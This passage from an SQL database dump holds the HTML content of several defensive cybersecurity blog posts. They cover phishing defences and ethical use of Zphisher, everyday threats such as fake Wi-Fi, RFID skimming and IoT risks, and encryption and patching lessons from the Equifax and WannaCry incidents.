dir=\"ltr\">Invest in tools that automatically filter and block phishing emails. Advanced email security tools can detect malicious patterns and URLs before they reach inboxes.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">4. Verify URLs</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Encourage users to always double-check URLs before entering sensitive information. The presence of \"https\" or a secure padlock icon can help validate a website\'s authenticity.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">5. Reporting Mechanisms</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Make it easy for users and employees to report phishing attempts. Early detection and reporting can prevent major issues.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">6. Perform Controlled Penetration Testing</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ethical hackers can use tools like Zphisher in a controlled setting to simulate phishing attacks. This allows organizations to identify and patch vulnerabilities before malicious actors exploit them.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Role of Ethical Tool Usage</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">It’s critical to emphasize that tools like Zphisher are not inherently malicious. Their value in teaching cybersecurity professionals how to identify and mitigate phishing threats cannot be overstated. That said, misuse is illegal, unethical, and can significantly harm individuals and organizations.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By adhering to ethical boundaries, security professionals can leverage tools like Zphisher to strengthen vulnerabilities and bolster defenses, further advancing the cybersecurity field.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing attacks represent one of the greatest challenges in today’s cybersecurity landscape. Zphisher, as a tool, embodies both the risks and opportunities present within this space. While it demonstrates how phishing can exploit trust and human error, it also opens a door to better education and improved defenses.</p>', '', NULL, NULL, 1, 'draft', '2025-01-15 18:59:48', '2026-01-12 21:41:44', 'Tools', 'The Rise of Phishing Attacks and the Role of Tools Like Zphisher', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(74, 'Protecting Yourself from Everyday Cyber Threats', 'protecting-yourself-from-everyday-cyber-threats', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With technology woven into every aspect of our daily lives, protecting yourself from cyber threats is more crucial than ever. Hackers are constantly developing new methods to exploit vulnerabilities, targeting unsuspecting individuals and their devices. This guide highlights common security risks and provides actionable steps to safeguard your personal information and digital life.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Man-in-the-Middle Attacks via Fake Wi-Fi Networks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Connecting to public Wi-Fi in places like cafes or airports can expose you to man-in-the-middle attacks. Hackers create fake Wi-Fi networks mimicking legitimate ones, intercepting the data you send and receive. This could include sensitive information like your passwords and browsing history.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Protect Yourself:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Avoid using public Wi-Fi networks unless absolutely necessary.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use a Virtual Private Network (VPN) to encrypt your internet traffic, making it unreadable to cybercriminals.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. The Dangers of Zero-Click Attacks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Zero-click attacks enable hackers to access your devices without requiring you to click or interact with anything. These attacks exploit vulnerabilities in your system to silently compromise your device, granting the attacker full access to your data.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Protect Yourself:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Regularly update your phone’s operating system to address security vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Be cautious about downloading apps or software that demand excessive permissions.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. RFID Skimming and Contactless Payment Risks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Contactless payments are convenient, but they come with risks. Hackers can use RFID readers to easily steal your credit card information, simply by being in proximity to your wallet.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Protect Yourself:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use an RFID-blocking wallet to prevent unauthorized access to your card details.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Alternatively, wrap your cards in aluminum foil to block RFID signals.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Hacking Car Key Fobs</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your car keys aren’t as secure as you might think. Hackers can intercept and replicate the rolling codes used by modern key fobs, giving them the ability to unlock your vehicle remotely at any time.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Protect Yourself:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use a key fob with built-in RFID shielding.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Store your key fob in a metal box or pouch to block signals when not in use.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Exploiting Wireless Devices</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Hackers often target wireless peripherals like keyboards and mice. By using specialized technology, they can remotely take control of these devices, posing a significant security risk.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Protect Yourself:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Opt for wired keyboards and mice when working on sensitive tasks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">If you prefer wireless devices, choose models with robust encryption features to deter interception.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. The Risk of IoT Devices in Your Home</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From smart refrigerators to internet-connected vacuum cleaners, IoT (Internet of Things) devices are becoming a household norm. However, these devices can act as pathways for hackers to access your home network.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Protect Yourself:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Be selective about the IoT devices you bring into your home.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Disconnect or isolate unnecessary devices from your main internet network.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. Outdated Software is a Major Risk</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Outdated software is one of the most easily exploited vulnerabilities. Hackers continuously search for older systems to infiltrate, where known vulnerabilities are not yet patched by updates.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Protect Yourself:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Regularly check for and install updates on all your devices, including smartphones, laptops, and tablets.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Enable automatic updates wherever possible to ensure your system is always secure.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. General Cyber Hygiene Tips</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The fundamentals of good cybersecurity go beyond protecting against specific exploits. By adopting these habits, you can strengthen your overall security.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Tips:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Use a Password Manager</strong></b>: Choose a reliable password manager to generate and store strong, unique passwords for all your accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Install Antivirus Software</strong></b>: Protect your devices against malware and other threats by keeping antivirus software up to date.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Be Cautious Online</strong></b>: Avoid clicking on unsolicited emails, suspicious links, or visiting unsecured websites.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Stay Updated</strong></b>: Follow trusted cybersecurity blogs and news outlets to stay informed about emerging threats and protection strategies.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While cyber threats are an ongoing challenge, proactive measures and good security practices can significantly reduce your risk of falling victim to online attacks. By staying vigilant, keeping your software updated, and using tools like VPNs, RFID blockers, and password managers, you can create a secure digital environment for yourself and your family.</p>', '', NULL, NULL, 1, 'draft', '2025-01-15 18:45:53', '2026-01-12 21:41:44', 'Information Security', 'Protecting Yourself from Everyday Cyber Threats', '', NULL),
(75, 'Unraveling Encryption: The Guardian of Data Security', 'unraveling-encryption-the-guardian-of-data-security', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Data security is among the most pressing challenges in the digital age. With the exponential growth of data generation and the increasing sophistication of cyber threats, protecting sensitive information has become a critical concern for organizations and individuals alike. Enter encryption—the invisible guardian of data security. At its core, encryption is a method of encoding information so only authorized parties can access it, making it an essential tool for safeguarding private and sensitive data.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog explores the profound role encryption plays in data security, the paradoxes it can create in cybersecurity patching, lessons from high-profile incidents, and best practices to strengthen defenses against vulnerabilities.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Importance of Encryption in Protecting Sensitive Data</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Encryption is a technology powerhouse that underpins modern cybersecurity. Think about your online banking transactions, emails, or stored health records; encryption ensures that even if these data sets are intercepted, they remain unreadable to unauthorized users.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Organizations utilize encryption to:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Prevent unauthorized access to databases.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Secure communications through encryption protocols like SSL/TLS.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Protect sensitive customer data from breaches.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Meet compliance standards like GDPR and HIPAA, where data encryption is mandatory.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">But while encryption is vital, it isn\'t a standalone solution. It must be part of a broader cybersecurity strategy, including patch management, vulnerability mitigation, and employee training.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybersecurity Patching: A Double-Edged Sword</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Patching is a fundamental aspect of cybersecurity. Regular patches ensure that software vulnerabilities, which could serve as entry points for attackers, are identified and resolved. However, patch management poses a paradox in which the very act of patching can sometimes lead to complications.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For instance:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Disruption to Systems</strong></b>: Unanticipated conflicts between new patches and existing systems can cause interruptions or degraded performance.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Failure to Patch in a Timely Manner</strong></b>: Delays in implementing patches can leave organizations exposed to attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Leveraging Exploit Patches</strong></b>: Attackers sometimes reverse-engineer patches to understand and exploit the vulnerability in unpatched systems.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This paradox reinforces the necessity of reliable patching strategies and the integration of encryption at all layers of infrastructure.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Lessons from Two Prominent Cybersecurity Incidents</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To better understand the role encryption and patch management play in data security, we turn to two high-profile cybersecurity failures that shook the global tech landscape.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Equifax Data Breach (2017)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What Happened</strong></b>: Equifax, one of the largest credit reporting agencies, suffered a catastrophic data breach that exposed the personal details of approximately 147 million individuals. The attackers exploited a vulnerability in the Apache Struts web application framework—one that had a known patch available months earlier.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">What Went Wrong</strong></b>: Equifax’s failure to apply a critical patch to its systems promptly enabled attackers to access encrypted data by exploiting the vulnerability.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Takeaway</strong></b>: The breach could have been mitigated with diligent patch management processes. Further, encrypting data at multiple levels could have minimized the exposure of sensitive information, adding an additional layer of security.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">WannaCry Ransomware Attack (2017)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What Happened</strong></b>: WannaCry, a global ransomware attack, infected over 230,000 computers across 150 countries by exploiting a vulnerability in Microsoft Windows. The vulnerability was patched by Microsoft two months earlier, but countless systems had not applied the update.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">What Went Wrong</strong></b>: A failure to adopt timely patching left systems vulnerable to the EternalBlue exploit, which the ransomware leveraged to spread quickly.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Takeaway</strong></b>: While encryption wouldn’t have prevented infection, encrypting critical systems and files could have limited the damage caused by WannaCry. Additionally, an emphasis on proactive vulnerability management and prompt patching could have stopped the ransomware in its tracks.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Cybersecurity Patching and Encryption</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To mitigate vulnerabilities and ensure optimal data protection, organizations should implement a combination of effective patch management and encryption practices. Below are some best practices every organization can adopt:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Cybersecurity Patching</h3>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Establish a Consistent Routine</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Automate patch management processes to ensure timely updates, and schedule regular reviews of system vulnerabilities.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Prioritize Critical Patches</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Not all vulnerabilities pose the same risk. Assess vulnerabilities for their risk level and prioritize patches based on potential impact.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Test Before Deployment</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Test patches in a controlled environment to identify potential conflicts or performance issues before full implementation.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Leverage Threat Intelligence</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Stay informed about emerging threats and vulnerabilities by subscribing to threat intelligence platforms to act swiftly on critical updates.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"5\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Train Staff</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Make sure employees understand the importance of updates, and avoid postponing patches on individual workstations.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Encryption Practices</h3>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Use End-to-End Encryption</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Protect communications by employing end-to-end encryption for messaging and file sharing.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] 